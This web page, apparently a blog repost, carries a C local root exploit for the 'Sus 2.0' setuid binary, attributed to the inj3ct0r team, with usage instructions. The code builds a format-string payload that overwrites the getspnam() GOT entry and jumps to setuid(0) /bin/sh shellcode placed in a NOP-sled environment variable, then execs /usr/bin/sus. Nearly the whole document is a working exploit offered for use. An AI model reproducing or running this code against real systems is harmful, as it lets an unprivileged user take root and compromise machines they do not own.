Sus 2.0. local root exploit

发表评论 (0) 查看评论

usage:

angel@inj3ct0r:~# gcc inj3ct0r.c -o inj3ct0r

angel@inj3ct0r:~# ./inj3ct0r

./inj3ct0r -o offset -g GOT address of getspnam() function

 

 

/usr/bin/sus: file format elf32-i386

 

usage: inj3ct0r [options]

 

Options:

-o [offset] -g [GOT]

 

angel@inj3ct0r:~# ./inj3ct0r -o 2000 -g 0x8049608

 

Using: retaddr = 0xbffffe88, GOT = 0x8049608, OFFSET = 2000

 

*/

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

#include <getopt.h>

 

#define BIN “/usr/bin/sus”

 

char buf[100];

 

char shallcode[] = // inj3ct0r team demo shellcode with setuid(0)

“\x31\xc0\x50\x68\x2f\x2f\x73\x68”

“\x68\x2f\x62\x69\x6e\x89\xe3\x50”

“\x53\x89\xe1\x99\xb0\x0b\xcd\x80”;

 

char shellcode[] = // inj3ct0r team small shellcode with setuid(0) 😉

“\x31\xc0\x31\xdb\xb0\x17\xcd\x80”

“\x31\xc0\x50\x68\x2f\x2f\x73\x68”

“\x68\x2f\x62\x69\x6e\x89\xe3\x50”

“\x53\x89\xe1\x99\xb0\x0b\xcd\x80”;

 

long getsp() {

__asm__(“movl %esp,%eax”);

}

 

// format string creator | xCrZx idea.

char *fmt_str_creator(long GOT, long RET, int ALIGN) {

 

long high,low;

memset(buf,0x00,sizeof(buf));

 

high=(RET >> 16) & 0xffff;

low = RET & 0xffff;

 

sprintf(buf,”%c%c%c%c%c%c%c%c%%.%dx%%%d$hn%%.%dx%%%d$hn”,

(char)((GOT&0xff)+2),(char)((GOT>>8)&0xff),(char)((GOT>>16)&0xff),(char)((GOT>>24)&0xff),

(char)(GOT&0xff),(char)((GOT>>8)&0xff),(char)((GOT>>16)&0xff),(char)((GOT>>24)&0xff),

(high>low)?(low-8):(high-8),

(high>low)?(ALIGN+1):(ALIGN),

(high>low)?(high-low):(low-high),

(high>low)?(ALIGN):(ALIGN+1));

 

return buf;

 

 

}

 

void usage() {

printf(“\nSus 2.0.* local root exploit\n\n”);

printf(“usage: inj3ct0r [options]\n\nOptions:\n-o [offset] -g [GOT]\n\n”);

exit(0);

}

 

 

int main(int argc, char **argv) {

 

long GOT;

long RET;

int ALIGN = 2, off = 0, opt;

 

char *av[3], *ev[2];

char *hack, buff[100];

 

hack = (char *)malloc(2000);

sprintf(hack, “HACK=”);

 

if ( argc < 4 ) { usage(); exit(0); }

 

while ((opt = getopt(argc, argv, “o:g:”)) != -1)

{

switch (opt) {

 

case ‘o’:

off = atoi(optarg);

break;

 

case ‘g’:

sscanf(optarg, “0x%x”, &GOT);

break;

 

default:

usage();

}

}

 

memset(hack + 5, 0x90, 1000-1-strlen(shellcode));

sprintf(hack + 1000 – strlen(shellcode), “%s”, shellcode);

 

RET = getsp()+off;

printf(“\nUsing: retaddr = 0x%x, GOT = 0x%x, OFFSET = %d\n\n”, RET, GOT, off);

memset(buff,0x00,sizeof(buf));

sprintf(buff,”%s”,fmt_str_creator(GOT+4,RET,ALIGN));

 

av[0] = BIN;

av[1] = buff;

av[2] = 0;

ev[0] = hack;

ev[1] = 0;

execve(*av, av, ev);

 

return 0;

}

发表评论?

0 条评论。

发表评论